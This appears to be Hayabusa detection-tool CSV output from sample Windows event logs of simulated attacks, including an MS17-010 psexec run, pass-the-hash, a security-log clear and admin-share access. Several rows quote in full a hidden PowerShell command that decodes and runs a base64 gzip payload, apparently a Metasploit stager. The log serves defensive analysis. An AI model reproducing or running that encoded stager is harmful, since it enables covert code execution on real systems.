2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
